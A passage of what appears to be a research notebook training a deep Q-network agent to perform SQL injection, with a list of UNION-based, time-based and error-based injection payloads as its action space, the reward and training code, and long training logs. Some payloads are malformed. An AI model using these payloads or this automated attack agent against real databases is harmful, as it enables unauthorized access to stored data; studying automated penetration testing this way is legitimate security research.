 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10-- ",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11-- ",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12-- ",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13-- ",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14-- ",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- ",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- ",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- ",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- ",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- ",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- ",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- ",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- ",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- ",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- ",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- ",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- ",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- ",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- ",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- ",
 "' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- ",
 "' UNION ALL SELECT USER()-- ",
 "' UNION ALL SELECT SLEEP(5)-- ",
 "' UNION ALL SELECT USER(),SLEEP(5)-- ",
 "' UNION ALL SELECT NULL-- ",
 "' AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))-- ",
 "' AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))-- ",
 "' AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- ",
 "' AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- ",
 "' AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- ",
 "' AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- ",
 "' AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))-- ",
 "' AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))-- ",
 "' AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))-- ",
 "' AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))-- ",
 "' AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))-- ",
 "' AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))-- ",
 "' AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))-- ",
 "' AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))-- ",
 "' AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))-- ",
 "' AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))-- ",
 "' AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))-- ",
 "' AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))-- ",
 "' AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))-- ",
 "' UNION ALL SELECT NULL#",
 "' AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))#",
 "' AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))#",

Link SQL Injection Attacks to Action Space

In [783]:
reward_success = 1
reward_end = 10
reward_norm = 0
# Reward for invalid action.
reward_mask = -1

# Perfoms an SQL injection attack based on an index from the list of payloads.
def perform_action(payload_index):
    payload = payloads[payload_index]
    reward = reward_norm
    episode_over = False

    try:
        df = inject_payload(payload)
        # Check episode termination condition, and if true, apply appropriate reward.
        # An episode will terminate once the goal of the final context is reached.
        # TODO: Ensure tables are filtered as the same column name could exist in another table.

        #for column in context['column_filter']:
        #    if column in df and context['goal'] in df[column].values:

        if context['goal'] in df.values:
            if context_index < len(contexts) - 1:
                reward = reward_success
                increment_context()
            else:
                reward = reward_end
                episode_over = True

        res = df.to_csv()
        has_error = no_error_char
    except:
        # Record error as a String.
        res = str(sys.exc_info()[1])
        has_error = error_char

    # Trim resulting string or pad it so that the length is equal to query_result_length.
    if len(res) > query_result_length:
        res = res[:query_result_length]
    else:
        res = res.ljust(query_result_length, padding_char)

    # Add error information if this is set.
    if mark_error:
        res = res + has_error

    return [ord(s) for s in res], reward, episode_over

DQN (Adapted from https://keras.io/examples/rl/deep_q_network_breakout/)

In [784]:
gamma = 0.99  # Discount factor for past rewards
epsilon = 1.0  # Epsilon greedy parameter
epsilon_min = 0.1  # Minimum epsilon greedy parameter
epsilon_max = 1.0  # Maximum epsilon greedy parameter
epsilon_interval = (
    epsilon_max - epsilon_min
)  # Rate at which to reduce chance of random action being taken
batch_size = 32  # Size of batch taken from replay buffer
max_steps_per_episode = 1000
max_running_reward = reward_success*2

num_actions = len(payloads)

# If a query result is an error, and if mark_error is true, this distinction will be added to the state information.
# TODO: Ensure mark_error information has a higher weighting in the neural net.
nn_input_size = query_result_length
if(mark_error):
    nn_input_size += 1

In [785]:
def create_q_model(batch_size):
    # Network defined by the Deepmind paper
    inputs = layers.Input(shape=(nn_input_size, 1), batch_size=batch_size)

    # Convolutions on the frames on the screen
    layer1 = layers.Conv1D(32, 1, strides=4, activation="relu")(inputs)
    layer2 = layers.Conv1D(64, 1, strides=2, activation="relu")(layer1)
    layer3 = layers.Conv1D(64, 1, strides=1, activation="relu")(layer2)

    layer4 = layers.Flatten()(layer3)

    layer5 = layers.Dense(512, activation="relu")(layer4)
    action = layers.Dense(num_actions, activation="linear")(layer5)

    return keras.Model(inputs=inputs, outputs=action)

# The first model makes the predictions for Q-values which are used to
# make an action.
model = create_q_model(1)
model.compile(optimizer='adam')
# Build a target model for the prediction of future rewards.
# The weights of a target model get updated every 10000 steps thus when the
# loss between the Q-values is calculated the target Q-value is stable.
model_target = create_q_model(batch_size)
model_target.compile(optimizer='adam')
model_target.summary()

Model: "model_97"
_________________________________________________________________
 Layer (type)                Output Shape              Param #
=================================================================
 input_103 (InputLayer)      [(32, 101, 1)]            0

 conv1d_296 (Conv1D)         (32, 26, 32)              64

 conv1d_297 (Conv1D)         (32, 13, 64)              2112

 conv1d_298 (Conv1D)         (32, 13, 64)              4160

 flatten_97 (Flatten)        (32, 832)                 0

 dense_194 (Dense)           (32, 512)                 426496

 dense_195 (Dense)           (32, 500)                 256500

=================================================================
Total params: 689,332
Trainable params: 689,332
Non-trainable params: 0
_________________________________________________________________

Create All Possible Payloads (Action Space)

In [786]:
def create_empty_state():
    state = padding_char * query_result_length
    if mark_error:
        state = state + no_error_char
    state = [ord(s) for s in state]
    return state

In [787]:
# In the Deepmind paper they use RMSProp however then Adam optimizer
# improves training time
optimizer = keras.optimizers.Adam(learning_rate=0.00025, clipnorm=1.0)

# Experience replay buffers
action_history = []
state_history = []
state_next_history = []
rewards_history = []
done_history = []
episode_reward_history = []
# Keep track of unique episodic solutions.
solutions = set()
running_reward = 0
episode_count = 0
frame_count = 0
# Number of frames to take random action and observe output
epsilon_random_frames = 50
# Number of frames for exploration
epsilon_greedy_frames = 100.0
# Maximum replay length
# Note: The Deepmind paper suggests 1000000 however this causes memory issues
max_memory_length = 50
# Train the model after 4 actions
update_after_actions = 4
# How often to update the target network
update_target_network = 100
# Using huber loss for stability
loss_function = keras.losses.Huber()

while True:  # Run until solved
    state = np.asarray(create_empty_state()).astype('float32')
    episode_reward = 0
    reset_context()
    episode_solutions = []

    for timestep in range(1, max_steps_per_episode):
        # env.render(); Adding this line would show the attempts
        # of the agent in a pop up window.
        frame_count += 1

        # Use epsilon-greedy for exploration
        if frame_count < epsilon_random_frames or epsilon > np.random.rand(1)[0]:
            # Take random action
            action = np.random.choice(num_actions)
        else:
            # Predict action Q-values
            # From environment state
            state = np.asarray(state).astype('float32').reshape(1, nn_input_size, 1)
            action_probs = model(state, training=False)
            # Take best action
            action = tf.argmax(action_probs[0]).numpy()

        # Decay probability of taking random action
        epsilon -= epsilon_interval / epsilon_greedy_frames
        epsilon = max(epsilon, epsilon_min)

        # Apply the sampled action in our environment
        state_next, reward, done = perform_action(action)
        state_next = np.asarray(state_next).astype('float32')

        episode_reward += reward

        # If the reward is positive, a context has been solved.
        # Keep track of this.
        if reward > 0:
            episode_solutions.append(action)

        # Save actions and states in replay buffer
        action_history.append(action)
        state_history.append(state.reshape(nn_input_size))
        state_next_history.append(state_next)
        done_history.append(done)
        rewards_history.append(reward)
        state = state_next

        # Update every fourth frame and once batch size is over 32
        if frame_count % update_after_actions == 0 and len(done_history) > batch_size:

            # Get indices of samples for replay buffers
            indices = np.random.choice(range(len(done_history)), size=batch_size)

            #for s in state_history:
            #    if len(s) != 101:
            #        print(s)

            # Using list comprehension to sample from replay buffer
            state_sample = np.array([state_history[i] for i in indices]).reshape(batch_size, nn_input_size, 1)
            state_next_sample = np.array([state_next_history[i] for i in indices]).reshape(batch_size, nn_input_size, 1)
            rewards_sample = [rewards_history[i] for i in indices]
            action_sample = [action_history[i] for i in indices]
            done_sample = tf.convert_to_tensor(
                [float(done_history[i]) for i in indices]
            )

            # Build the updated Q-values for the sampled future states
            # Use the target model for stability
            future_rewards = model_target.predict(state_next_sample, batch_size=batch_size, verbose=0)
            # Q value = reward + discount factor * expected future reward
            updated_q_values = rewards_sample + gamma * tf.reduce_max(
                future_rewards, axis=1
            )

            # If final frame set the last value to -1
            updated_q_values = updated_q_values * (1 - done_sample) - done_sample

            # Create a mask so we only calculate loss on the updated Q-values
            masks = tf.one_hot(action_sample, num_actions)

            with tf.GradientTape() as tape:
                # Train the model on the states and updated Q-values
                q_values = model(state_sample)

                # Apply the masks to the Q-values to get the Q-value for action taken
                q_action = tf.reduce_sum(tf.multiply(q_values, masks), axis=1)
                # Calculate loss between new Q-value and old Q-value
                loss = loss_function(updated_q_values, q_action)

            # Backpropagation
            grads = tape.gradient(loss, model.trainable_variables)
            optimizer.apply_gradients(zip(grads, model.trainable_variables))

        if frame_count % update_target_network == 0:
            # update the the target network with new weights
            model_target.set_weights(model.get_weights())
            # Log details
            template = 'Running reward: {:.2f}\t Episode {}\t Frame count: {}'
            print(template.format(running_reward, episode_count, frame_count))

        # Limit the state and reward history
        if len(rewards_history) > max_memory_length:
            del rewards_history[:1]
            del state_history[:1]
            del state_next_history[:1]
            del action_history[:1]
            del done_history[:1]

        if done:
            # Append the chain of solutions for this episode.
            # This episode's solutions must be converted to a tuple to
            # ensure the overall solutions set only contains unique elements.
            solutions.add(tuple(episode_solutions))
            break

    # Update running reward to check condition for solving
    episode_reward_history.append(episode_reward)
    if len(episode_reward_history) > 100:
        del episode_reward_history[:1]
    running_reward = np.mean(episode_reward_history)

    episode_count += 1

    if running_reward > max_running_reward:  # Condition to consider the task solved
        print(f'Solved at episode {episode_count}!')
        break

Running reward: 0.00	 Episode 0	 Frame count: 100
Running reward: 0.00	 Episode 0	 Frame count: 200
Running reward: 0.00	 Episode 0	 Frame count: 300
Running reward: 0.00	 Episode 0	 Frame count: 400
Running reward: 0.00	 Episode 0	 Frame count: 500
Running reward: 0.00	 Episode 0	 Frame count: 600
Running reward: 0.00	 Episode 0	 Frame count: 700
Running reward: 0.00	 Episode 0	 Frame count: 800
Running reward: 0.00	 Episode 0	 Frame count: 900
Running reward: 1.00	 Episode 1	 Frame count: 1000
Running reward: 1.00	 Episode 1	 Frame count: 1100
Running reward: 1.00	 Episode 1	 Frame count: 1200
Running reward: 1.00	 Episode 1	 Frame count: 1300
Running reward: 1.00	 Episode 1	 Frame count: 1400
Running reward: 1.00	 Episode 1	 Frame count: 1500
Running reward: 1.00	 Episode 1	 Frame count: 1600
Running reward: 1.00	 Episode 1	 Frame count: 1700
Running reward: 1.00	 Episode 1	 Frame count: 1800

C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:

Running reward: 1.00	 Episode 1	 Frame count: 1900
Running reward: 0.50	 Episode 2	 Frame count: 2000

C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:

Running reward: 0.50	 Episode 2	 Frame count: 2100

C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:

Running reward: 0.50	 Episode 2	 Frame count: 2200
Running reward: 0.50	 Episode 2	 Frame count: 2300
Running reward: 0.50	 Episode 2	 Frame count: 2400
Running reward: 0.50	 Episode 2	 Frame count: 2500
Running reward: 0.50	 Episode 2	 Frame count: 2600
Running reward: 0.50	 Episode 2	 Frame count: 2700
Running reward: 0.50	 Episode 2	 Frame count: 2800
Running reward: 0.50	 Episode 2	 Frame count: 2900
Running reward: 0.33	 Episode 3	 Frame count: 3000
Running reward: 0.33	 Episode 3	 Frame count: 3100
Running reward: 0.33	 Episode 3	 Frame count: 3200
Running reward: 0.33	 Episode 3	 Frame count: 3300
Running reward: 0.33	 Episode 3	 Frame count: 3400
Running reward: 0.33	 Episode 3	 Frame count: 3500
Running reward: 0.33	 Episode 3	 Frame count: 3600
Running reward: 0.33	 Episode 3	 Frame count: 3700
Running reward: 0.33	 Episode 3	 Frame count: 3800
Running reward: 0.33	 Episode 3	 Frame count: 3900
Running reward: 0.25	 Episode 4	 Frame count: 4000
Running reward: 0.25	 Episode 4	 Frame count: 4100
Running reward: 0.25	 Episode 4	 Frame count: 4200
Running reward: 0.25	 Episode 4	 Frame count: 4300
Running reward: 0.25	 Episode 4	 Frame count: 4400
Running reward: 0.25	 Episode 4	 Frame count: 4500
Running reward: 0.25	 Episode 4	 Frame count: 4600
Running reward: 0.25	 Episode 4	 Frame count: 4700
Running reward: 0.25	 Episode 4	 Frame count: 4800
Running reward: 0.25	 Episode 4	 Frame count: 4900
Running reward: 0.20	 Episode 5	 Frame count: 5000
Running reward: 0.20	 Episode 5	 Frame count: 5100
Running reward: 0.20	 Episode 5	 Frame count: 5200
Running reward: 0.20	 Episode 5	 Frame count: 5300
Running reward: 0.20	 Episode 5	 Frame count: 5400
Running reward: 0.20	 Episode 5	 Frame count: 5500
Running reward: 0.20	 Episode 5	 Frame count: 5600
Running reward: 0.20	 Episode 5	 Frame count: 5700
Running reward: 0.20	 Episode 5	 Frame count: 5800
Running reward: 0.20	 Episode 5	 Frame count: 5900
Running reward: 0.17	 Episode 6	 Frame count: 6000
Running reward: 0.17	 Episode 6	 Frame count: 6100
Running reward: 0.17	 Episode 6	 Frame count: 6200
Running reward: 0.17	 Episode 6	 Frame count: 6300
Running reward: 0.17	 Episode 6	 Frame count: 6400
Running reward: 0.17	 Episode 6	 Frame count: 6500
Running reward: 0.17	 Episode 6	 Frame count: 6600
Running reward: 0.17	 Episode 6	 Frame count: 6700
Running reward: 0.17	 Episode 6	 Frame count: 6800
Running reward: 0.17	 Episode 6	 Frame count: 6900
Running reward: 0.14	 Episode 7	 Frame count: 7000
Running reward: 0.14	 Episode 7	 Frame count: 7100
Running reward: 0.14	 Episode 7	 Frame count: 7200
Running reward: 0.14	 Episode 7	 Frame count: 7300
Running reward: 0.14	 Episode 7	 Frame count: 7400
Running reward: 0.14	 Episode 7	 Frame count: 7500
Running reward: 0.14	 Episode 7	 Frame count: 7600
Running reward: 0.14	 Episode 7	 Frame count: 7700
Running reward: 0.14	 Episode 7	 Frame count: 7800
Running reward: 0.14	 Episode 7	 Frame count: 7900
Running reward: 0.12	 Episode 8	 Frame count: 8000
Running reward: 0.12	 Episode 8	 Frame count: 8100
Running reward: 0.12	 Episode 8	 Frame count: 8200
Running reward: 0.12	 Episode 8	 Frame count: 8300
Running reward: 0.12	 Episode 8	 Frame count: 8400
Running reward: 0.12	 Episode 8	 Frame count: 8500
Running reward: 0.12	 Episode 8	 Frame count: 8600
Running reward: 0.12	 Episode 8	 Frame count: 8700
Running reward: 0.12	 Episode 8	 Frame count: 8800
Running reward: 0.12	 Episode 8	 Frame count: 8900
Running reward: 0.11	 Episode 9	 Frame count: 9000
Running reward: 0.11	 Episode 9	 Frame count: 9100
Running reward: 0.11	 Episode 9	 Frame count: 9200
Running reward: 0.11	 Episode 9	 Frame count: 9300
Running reward: 0.11	 Episode 9	 Frame count: 9400
Running reward: 0.11	 Episode 9	 Frame count: 9500
Running reward: 0.11	 Episode 9	 Frame count: 9600
Running reward: 0.11	 Episode 9	 Frame count: 9700
Running reward: 0.11	 Episode 9	 Frame count: 9800
Running reward: 0.11	 Episode 9	 Frame count: 9900
Running reward: 0.20	 Episode 10	 Frame count: 10000
Running reward: 0.20	 Episode 10	 Frame count: 10100
Running reward: 0.20	 Episode 10	 Frame count: 10200
Running reward: 0.20	 Episode 10	 Frame count: 10300
Running reward: 0.20	 Episode 10	 Frame count: 10400
Running reward: 0.20	 Episode 10	 Frame count: 10500
Running reward: 0.20	 Episode 10	 Frame count: 10600
Running reward: 0.20	 Episode 10	 Frame count: 10700
Running reward: 0.20	 Episode 10	 Frame count: 10800
Running reward: 0.20	 Episode 10	 Frame count: 10900
Running reward: 0.18	 Episode 11	 Frame count: 11000
Running reward: 0.18	 Episode 11	 Frame count: 11100
Running reward: 0.18	 Episode 11	 Frame count: 11200
Running reward: 0.18	 Episode 11	 Frame count: 11300
Running reward: 0.18	 Episode 11	 Frame count: 11400
Running reward: 0.18	 Episode 11	 Frame count: 11500
Running reward: 0.18	 Episode 11	 Frame count: 11600
Running reward: 0.18	 Episode 11	 Frame count: 11700
Running reward: 0.18	 Episode 11	 Frame count: 11800
Running reward: 0.18	 Episode 11	 Frame count: 11900
Running reward: 0.17	 Episode 12	 Frame count: 12000
Running reward: 0.17	 Episode 12	 Frame count: 12100
Running reward: 0.17	 Episode 12	 Frame count: 12200
Running reward: 0.17	 Episode 12	 Frame count: 12300
Running reward: 0.17	 Episode 12	 Frame count: 12400
Running reward: 0.17	 Episode 12	 Frame count: 12500
Running reward: 0.17	 Episode 12	 Frame count: 12600
Running reward: 0.17	 Episode 12	 Frame count: 12700
Running reward: 0.17	 Episode 12	 Frame count: 12800
Running reward: 0.17	 Episode 12	 Frame count: 12900
Running reward: 0.23	 Episode 13	 Frame count: 13000
Running reward: 0.23	 Episode 13	 Frame count: 13100
Running reward: 0.23	 Episode 13	 Frame count: 13200
Running reward: 0.23	 Episode 13	 Frame count: 13300
Running reward: 0.23	 Episode 13	 Frame count: 13400
Running reward: 0.23	 Episode 13	 Frame count: 13500
Running reward: 0.23	 Episode 13	 Frame count: 13600
Running reward: 0.23	 Episode 13	 Frame count: 13700
Running reward: 0.23	 Episode 13	 Frame count: 13800
Running reward: 0.23	 Episode 13	 Frame count: 13900
Running reward: 0.21	 Episode 14	 Frame count: 14000

C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:

Running reward: 0.21	 Episode 14	 Frame count: 14100
Running reward: 0.21	 Episode 14	 Frame count: 14200
Running reward: 0.21	 Episode 14	 Frame count: 14300
Running reward: 0.21	 Episode 14	 Frame count: 14400
Running reward: 0.21	 Episode 14	 Frame count: 14500
Running reward: 0.21	 Episode 14	 Frame count: 14600
Running reward: 0.21	 Episode 14	 Frame count: 14700
Running reward: 0.21	 Episode 14	 Frame count: 14800
Running reward: 0.21	 Episode 14	 Frame count: 14900
Running reward: 0.27	 Episode 15	 Frame count: 15000
Running reward: 0.27	 Episode 15	 Frame count: 15100
Running reward: 0.27	 Episode 15	 Frame count: 15200
Running reward: 0.27	 Episode 15	 Frame count: 15300
Running reward: 0.27	 Episode 15	 Frame count: 15400

C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:

Running reward: 0.27	 Episode 15	 Frame count: 15500
Running reward: 0.27	 Episode 15	 Frame count: 15600
Running reward: 0.27	 Episode 15	 Frame count: 15700
Running reward: 0.27	 Episode 15	 Frame count: 15800
Running reward: 0.27	 Episode 15	 Frame count: 15900
Running reward: 0.25	 Episode 16	 Frame count: 16000
Running reward: 0.25	 Episode 16	 Frame count: 16100
Running reward: 0.25	 Episode 16	 Frame count: 16200
Running reward: 0.25	 Episode 16	 Frame count: 16300
Running reward: 0.25	 Episode 16	 Frame count: 16400
Running reward: 0.25	 Episode 16	 Frame count: 16500
Running reward: 0.25	 Episode 16	 Frame count: 16600
Running reward: 0.25	 Episode 16	 Frame count: 16700
Running reward: 0.25	 Episode 16	 Frame count: 16800
Running reward: 0.25	 Episode 16	 Frame count: 16900
Running reward: 0.29	 Episode 17	 Frame count: 17000
Running reward: 0.29	 Episode 17	 Frame count: 17100
Running reward: 0.29	 Episode 17	 Frame count: 17200
Running reward: 0.29	 Episode 17	 Frame count: 17300
Running reward: 0.29	 Episode 17	 Frame count: 17400
Running reward: 0.29	 Episode 17	 Frame count: 17500
Running reward: 0.29	 Episode 17	 Frame count: 17600
Running reward: 0.29	 Episode 17	 Frame count: 17700
Running reward: 0.29	 Episode 17	 Frame count: 17800
Running reward: 0.29	 Episode 17	 Frame count: 17900
Running reward: 0.28	 Episode 18	 Frame count: 18000
Running reward: 0.28	 Episode 18	 Frame count: 18100
Running reward: 0.28	 Episode 18	 Frame count: 18200
Running reward: 0.28	 Episode 18	 Frame count: 18300
Running reward: 0.28	 Episode 18	 Frame count: 18400
Running reward: 0.28	 Episode 18	 Frame count: 18500
Running reward: 0.28	 Episode 18	 Frame count: 18600
Running reward: 0.28	 Episode 18	 Frame count: 18700
Running reward: 0.28	 Episode 18	 Frame count: 18800
Running reward: 0.28	 Episode 18	 Frame count: 18900
Running reward: 0.26	 Episode 19	 Frame count: 19000
Running reward: 0.26	 Episode 19	 Frame count: 19100
Running reward: 0.26	 Episode 19	 Frame count: 19200
Running reward: 0.26	 Episode 19	 Frame count: 19300
Running reward: 0.26	 Episode 19	 Frame count: 19400
Running reward: 0.26	 Episode 19	 Frame count: 19500
Running reward: 0.26	 Episode 19	 Frame count: 19600
Running reward: 0.26	 Episode 19	 Frame count: 19700
Running reward: 0.26	 Episode 19	 Frame count: 19800
Running reward: 0.26	 Episode 19	 Frame count: 19900
Running reward: 0.25	 Episode 20	 Frame count: 20000
Running reward: 0.25	 Episode 20	 Frame count: 20100
Running reward: 0.25	 Episode 20	 Frame count: 20200
Running reward: 0.25	 Episode 20	 Frame count: 20300
Running reward: 0.25	 Episode 20	 Frame count: 20400
Running reward: 0.25	 Episode 20	 Frame count: 20500
Running reward: 0.25	 Episode 20	 Frame count: 20600
Running reward: 0.25	 Episode 20	 Frame count: 20700
Running reward: 0.25	 Episode 20	 Frame count: 20800
Running reward: 0.25	 Episode 20	 Frame count: 20900
Running reward: 0.24	 Episode 21	 Frame count: 21000
Running reward: 0.24	 Episode 21	 Frame count: 21100
Running reward: 0.24	 Episode 21	 Frame count: 21200
Running reward: 0.24	 Episode 21	 Frame count: 21300
Running reward: 0.24	 Episode 21	 Frame count: 21400
Running reward: 0.24	 Episode 21	 Frame count: 21500
Running reward: 0.24	 Episode 21	 Frame count: 21600
Running reward: 0.24	 Episode 21	 Frame count: 21700
Running reward: 0.24	 Episode 21	 Frame count: 21800
Running reward: 0.24	 Episode 21	 Frame count: 21900
Running reward: 0.23	 Episode 22	 Frame count: 22000
Running reward: 0.23	 Episode 22	 Frame count: 22100
Running reward: 0.23	 Episode 22	 Frame count: 22200
Running reward: 0.23	 Episode 22	 Frame count: 22300
Running reward: 0.23	 Episode 22	 Frame count: 22400
Running reward: 0.23	 Episode 22	 Frame count: 22500
Running reward: 0.23	 Episode 22	 Frame count: 22600
Running reward: 0.23	 Episode 22	 Frame count: 22700
Running reward: 0.23	 Episode 22	 Frame count: 22800
Running reward: 0.23	 Episode 22	 Frame count: 22900
Running reward: 0.22	 Episode 23	 Frame count: 23000
Running reward: 0.22	 Episode 23	 Frame count: 23100
Running reward: 0.22	 Episode 23	 Frame count: 23200
Running reward: 0.22	 Episode 23	 Frame count: 23300
Running reward: 0.22	 Episode 23	 Frame count: 23400
Running reward: 0.22	 Episode 23	 Frame count: 23500
Running reward: 0.22	 Episode 23	 Frame count: 23600
Running reward: 0.22	 Episode 23	 Frame count: 23700
Running reward: 0.22	 Episode 23	 Frame count: 23800
Running reward: 0.22	 Episode 23	 Frame count: 23900
Running reward: 0.25	 Episode 24	 Frame count: 24000
Running reward: 0.25	 Episode 24	 Frame count: 24100
Running reward: 0.25	 Episode 24	 Frame count: 24200
Running reward: 0.25	 Episode 24	 Frame count: 24300
Running reward: 0.25	 Episode 24	 Frame count: 24400
Running reward: 0.25	 Episode 24	 Frame count: 24500
